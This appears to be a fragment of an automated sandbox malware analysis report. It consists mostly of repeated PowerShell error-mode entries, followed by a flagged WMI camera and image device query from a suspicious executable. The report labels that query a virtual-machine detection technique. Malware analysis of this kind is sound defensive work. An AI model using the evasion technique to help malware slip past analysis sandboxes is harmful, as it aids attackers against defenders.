                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
